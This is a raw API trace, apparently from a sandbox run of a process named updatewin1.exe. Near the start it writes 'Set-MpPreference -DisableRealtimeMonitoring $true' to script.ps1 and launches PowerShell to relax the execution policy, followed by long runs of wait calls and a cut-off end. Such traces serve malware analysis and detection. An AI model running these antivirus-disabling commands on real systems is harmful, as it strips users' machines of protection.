[0131.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x64cb60 [0131.042] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0131.042] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0131.059] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0131.060] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" --Admin" [0131.060] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" --Admin", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x64d368*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" [0131.060] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d8ec | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0131.075] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="script.ps1" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1") returned 1 [0131.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\script.ps1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0131.075] lstrcpyA (in: lpString1=0x18e0ec, lpString2="Set-MpPreference -DisableRealtimeMonitoring $true" | out: lpString1="Set-MpPreference -DisableRealtimeMonitoring $true") returned="Set-MpPreference -DisableRealtimeMonitoring $true" [0131.076] lstrlenA (lpString="Set-MpPreference -DisableRealtimeMonitoring $true") returned 49 [0131.076] WriteFile (in: hFile=0xa8, lpBuffer=0x18e0ec*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x18d8e8, lpOverlapped=0x0 | out: lpBuffer=0x18e0ec*, lpNumberOfBytesWritten=0x18d8e8*=0x31, lpOverlapped=0x0) returned 1 [0131.076] CloseHandle (hObject=0xa8) returned 1 [0131.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x64ecd8 [0131.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64ed50 [0131.077] SetLastError (dwErrCode=0x0) [0131.077] lstrcpyW (in: lpString1=0x18d4e0, lpString2="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" | out: lpString1="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned") returned="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" [0131.078] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d498*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d488 | out: lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessInformation=0x18d488*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x728, dwThreadId=0x6b0)) returned 1 [0131.550] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.559] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.574] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.590] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.773] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.777] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.793] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.808] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.837] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.841] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.855] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.871] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.886] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.902] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.917] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.933] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.949] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.964] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.980] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.995] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.011] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.030] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.042] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.058] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.074] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.089] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.105] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.138] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.151] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.170] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.193] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.198] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.215] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.229] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.245] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.261] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.276] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.292] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.308] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.323] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.339] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.357] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.370] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.385] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.401] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.417] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.432] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.448] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.463] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.479] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.495] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.511] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.526] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.541] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.557] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.584] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.589] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.609] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.651] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.698] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.713] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.729] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.750] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.760] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.776] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.792] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.806] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.822] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.838] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.853] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.869] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.885] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.900] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.916] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.931] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.947] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.963] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.978] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.994] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.009] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.025] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.041] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.056] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.072] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.088] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.103] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.137] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.151] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.166] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.181] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.197] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.212] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.228] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.243] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.259] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.275] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.290] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.306] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.322] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.337] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.353] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.368] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.384] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.399] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.415] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.431] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.447] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.463] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.478] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.494] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.509] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.524] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.540] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.556] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.571] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.603] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.618] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.633] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.649] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.665] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.704] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.712] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.727] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.743] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.759] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.775] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.789] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.805] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.821] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.836] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.854] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.867] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.883] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.899] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.915] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.930] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.945] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.961] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.977] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.992] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.008] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.024] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.039] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.055] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.070] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.086] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.102] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.125] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.133] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.148] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.164] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.179] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.195] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.211] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.227] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.244] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.257] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.273] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.289] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.304] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.320] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.336] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.351] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.367] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.382] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.398] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.414] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.429] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.445] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.460] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.476] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.492] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.507] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.523] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.538] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.554] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.570] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.585] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.610] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.616] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.632] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.647] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.663] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.679] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.694] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.710] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.725] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.741] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.757] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.773] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.788] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.804] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.819] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.835] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.850] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.866] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.882] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.897] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.913] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.929] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.944] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.960] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.975] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.991] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.006] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.022] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.037] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.053] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.073] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.094] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.100] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.123] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.131] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.146] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.162] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.178] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.194] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.209] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.225] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.240] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.256] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.272] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.287] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.303] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.318] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.334] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.350] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.366] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.382] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.396] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.412] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.427] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.443] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.459] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.474] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.490] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.505] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.522] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.537] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.552] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.568] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.583] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.599] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.633] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.646] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.661] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.677] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.693] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.708] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.724] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.740] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.755] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.771] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.786] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.802] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.819] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.833] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.849] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.864] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.880] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.895] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.911] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.927] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.942] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.958] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.973] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.990] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0136.005] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0136.077] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0136.083] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0136.098] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0136.122] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0136.130] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.448] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.464] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.495] WaitForSingleObject 